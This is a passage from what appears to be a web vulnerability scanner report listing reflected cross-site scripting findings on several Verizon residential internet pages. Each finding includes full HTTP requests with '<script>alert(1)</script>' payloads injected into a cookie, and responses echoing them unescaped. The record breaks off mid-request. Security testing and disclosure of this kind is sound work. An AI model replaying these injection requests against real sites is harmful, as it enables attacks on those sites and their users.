Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX5cb38'><script>alert(1)</script>20fbdf6b466; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68020
Expires: Sat, 20 Nov 2010 02:11:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:11:34 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5cb38'><script>alert(1)</script>20fbdf6b466; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5CB38'><SCRIPT>ALERT(1)</SCRIPT>20FBDF6B466 ' />
...[SNIP]...

1.98. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 2cb7b<script>alert(1)</script>f0189105aea was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX2cb7b<script>alert(1)</script>f0189105aea; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68016
Expires: Sat, 20 Nov 2010 02:11:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:11:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX2cb7b<script>alert(1)</script>f0189105aea; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Compare to Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX2CB7B<SCRIPT>ALERT(1)</SCRIPT>F0189105AEA </DIV>
...[SNIP]...

1.99. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 194a6'><script>alert(1)</script>2fd72da871 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX194a6'><script>alert(1)</script>2fd72da871; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57999
Expires: Sat, 20 Nov 2010 02:12:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX194a6'><script>alert(1)</script>2fd72da871; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX194A6'><SCRIPT>ALERT(1)</SCRIPT>2FD72DA871 ' />
...[SNIP]...

1.100. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4065d<script>alert(1)</script>5ddbcf331f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX4065d<script>alert(1)</script>5ddbcf331f; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57995
Expires: Sat, 20 Nov 2010 02:12:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:47 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4065d<script>alert(1)</script>5ddbcf331f; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4065D<SCRIPT>ALERT(1)</SCRIPT>5DDBCF331F </DIV>
...[SNIP]...

1.101. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae4e1'><script>alert(1)</script>ff47fc759aa was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXae4e1'><script>alert(1)</script>ff47fc759aa; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94442
Expires: Sat, 20 Nov 2010 02:12:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:39 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXae4e1'><script>alert(1)</script>ff47fc759aa; path=/
Set-Cookie: ContextInfo_Language=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAE4E1'><SCRIPT>ALERT(1)</SCRIPT>FF47FC759AA ' />
...[SNIP]...

1.102. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 24a11<script>alert(1)</script>42da884f4fe was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX24a11<script>alert(1)</script>42da884f4fe; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94438
Expires: Sat, 20 Nov 2010 02:12:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX24a11<script>alert(1)</script>42da884f4fe; path=/
Set-Cookie: ContextInfo_Language=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX24A11<SCRIPT>ALERT(1)</SCRIPT>42DA884F4FE </DIV>
...[SNIP]...

1.103. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 426b9'><script>alert(1)</script>37e01c2eceb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX426b9'><script>alert(1)</script>37e01c2eceb; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74937
Expires: Sat, 20 Nov 2010 02:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:11:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX426b9'><script>alert(1)</script>37e01c2eceb; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX426B9'><SCRIPT>ALERT(1)</SCRIPT>37E01C2ECEB ' />
...[SNIP]...

1.104. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 197a3<script>alert(1)</script>26eaa0e1290 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX197a3<script>alert(1)</script>26eaa0e1290; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74933
Expires: Sat, 20 Nov 2010 02:11:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:11:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX197a3<script>alert(1)</script>26eaa0e1290; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX197A3<SCRIPT>ALERT(1)</SCRIPT>26EAA0E1290 </DIV>
...[SNIP]...

1.105. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d4d98'><script>alert(1)</script>34c18cd4d82 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXd4d98'><script>alert(1)</script>34c18cd4d82; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104008
Expires: Sat, 20 Nov 2010 02:13:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:13:39 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXd4d98'><script>alert(1)</script>34c18cd4d82; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD4D98'><SCRIPT>ALERT(1)</SCRIPT>34C18CD4D82 ' />
...[SNIP]...

1.106. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9fc75<script>alert(1)</script>7aa49d06f5e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
